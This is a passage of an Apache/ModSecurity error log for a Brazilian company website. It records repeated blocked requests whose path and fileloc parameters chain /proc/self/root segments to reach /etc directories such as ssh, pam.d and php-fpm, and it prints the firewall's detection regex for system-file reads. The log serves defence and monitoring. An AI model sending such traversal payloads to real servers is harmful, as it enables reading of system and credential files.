"abud8gbLMZ6AikZjR9UkVQAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:55:46.695121 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.241.31:45518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abud8hkFeYa1D6dYQnCzzAAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:56:10.647268 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.243.128:48112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueCl_V7PWP6ixUYl6CyAAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:56:18.497547 2026] [mime_magic:error] [pid 14269:tid 140411632822016] (70014)End of file found: [client 57.141.18.78:39092] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:56:27.827550 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:47832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueG8df6f5d65gmYZQ6VwAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:56:55.674993 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:40672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueNwkwaGbbGflqUZB7fwAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:56:56.106363 2026] [:error] [pid 19093:tid 140411725141760] [client 74.7.244.43:52296] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abueOF_V7PWP6ixUYl6DBgAAAoI"]
[Thu Mar 19 03:57:09.793900 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:39652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueReyqAr6etmhZHNorOQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:57:11.082348 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:42150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueR9a6ubjKNq_cu4YGLQAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:57:12.443748 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.241.31:42152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueSP-YZRR_7pZ7nDJUeAAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:57:14.895697 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:42160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueSsdf6f5d65gmYZQ6ZgAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:16.187794 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.243.128:47626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueTF_V7PWP6ixUYl6DIgAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:57:17.413675 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:42174] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueTda6ubjKNq_cu4YGOgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:22.026399 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:58574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueUta6ubjKNq_cu4YGRwAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:22.104625 2026] [:error] [pid 27293:tid 140411741927168] [client 74.7.243.128:34312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueUv-YZRR_7pZ7nDJUfgAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:23.332402 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:58582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueU_u8EFLIOrSqIptk4wAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:24.626913 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:58594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueVOoXxyEfFpUF8f_YlQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:25.977888 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:58610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueVcdf6f5d65gmYZQ6bAAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:28.155824 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:58622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueVwkwaGbbGflqUZB7mQAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:29.539951 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:44248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueWQkwaGbbGflqUZB7mgAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:57:29.763172 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.241.31:38412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueWQbLMZ6AikZjR9UkhwAAAA8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:31.120876 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:38418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueW8df6f5d65gmYZQ6cwAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:57:32.111026 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:58232] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueXMdf6f5d65gmYZQ6dAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:57:32.400728 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.241.31:38428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 